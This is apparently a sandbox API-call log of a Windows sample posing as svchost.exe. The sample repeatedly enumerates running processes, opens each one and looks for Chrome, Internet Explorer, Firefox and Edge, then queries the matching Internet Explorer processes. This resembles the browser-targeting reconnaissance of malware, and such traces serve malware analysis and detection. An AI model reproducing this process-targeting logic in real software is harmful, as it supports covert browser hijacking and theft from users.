	[0216.331] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.331] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0216.332] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x4808
	[0216.332] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.332] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0216.332] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.332] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.333] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.333] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0216.333] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.333] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.333] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0216.334] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x480c
	[0216.334] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.334] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0216.334] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.334] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.335] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.335] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0216.335] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.335] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.335] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0216.336] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x4810
	[0216.336] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.336] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0216.336] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.336] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.337] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.337] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0216.337] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.337] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.337] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0216.338] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x4814
	[0216.338] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.338] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0216.339] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.339] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.339] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.339] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0216.340] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.340] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.340] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0216.341] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x4818
	[0216.341] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.341] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0216.341] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.341] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.342] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.342] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0216.342] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.342] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.342] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0216.343] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x481c
	[0216.343] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.343] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0216.343] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.343] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.344] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.344] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0216.344] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.344] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.344] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0216.345] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x4820
	[0216.345] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.345] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0216.346] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.346] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.346] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.346] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0216.347] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.347] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.347] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0216.348] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x4824
	[0216.348] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.348] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0216.348] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.348] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.348] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.348] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0216.348] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.349] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.349] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0216.349] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x4828
	[0216.349] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.349] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0216.350] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.350] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.350] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.350] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0216.350] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.350] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.350] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0216.351] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x482c
	[0216.351] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.351] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0216.352] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.352] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.352] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.352] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0216.353] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.353] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.353] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0216.354] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x4830
	[0216.354] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.354] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0216.354] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.354] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.355] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.355] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0216.355] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.355] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.356] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0216.357] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x4834
	[0216.357] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.357] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0216.357] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.357] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.358] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.358] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0216.358] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.358] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.359] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0216.359] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x4838
	[0216.359] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.360] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0216.360] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.360] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.361] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.361] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0216.361] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.361] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.362] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0216.363] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x483c
	[0216.363] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.363] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0216.363] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.363] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.364] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.364] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0216.365] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.365] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.365] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0216.366] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x4840
	[0216.366] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.366] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0216.366] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.366] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0216.366] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.366] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0216.367] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.367] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.367] NtQueryInformationProcess (in: ProcessHandle=0x4840, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0216.367] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0216.367] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0216.368] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x4844
	[0216.368] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.368] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0216.368] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.368] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0216.369] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.369] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0216.369] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.369] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.369] NtQueryInformationProcess (in: ProcessHandle=0x4844, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0216.369] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0216.370] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0216.370] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x4848
	[0216.370] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.370] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0216.371] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.371] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.371] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.371] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0216.371] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.371] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.371] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0216.372] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x484c
	[0216.372] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.372] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0216.373] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.373] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.373] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.373] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0216.373] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.373] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.374] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0216.374] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x4850
	[0216.374] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.374] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0216.375] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.375] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.375] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.375] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0216.375] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.375] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.375] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0216.376] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0216.377] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x4854
	[0216.377] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.377] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0216.377] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.377] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.378] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.378] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0216.378] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.378] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.378] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0216.379] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x468) returned 0x4858
	[0216.379] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.379] StrStrIA (lpFirst="dllhost.exe", lpSrch="chrome.exe") returned 0x0
	[0216.379] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.379] StrStrIA (lpFirst="dllhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.379] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.379] StrStrIA (lpFirst="dllhost.exe", lpSrch="firefox.exe") returned 0x0
	[0216.380] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.380] StrStrIA (lpFirst="dllhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.380] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0216.381] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x485c
	[0216.381] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.381] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0216.381] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.381] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.381] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.381] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0216.382] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.382] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.382] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0216.383] CloseHandle (hObject=0x188) returned 1
	[0216.383] Sleep (dwMilliseconds=0x64) 
	[0216.483] GetCurrentProcessId () returned 0x110
	[0216.483] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0216.488] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0216.490] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0216.490] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0216.491] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x4860
	[0216.491] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.491] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0216.492] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.492] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.492] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.492] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
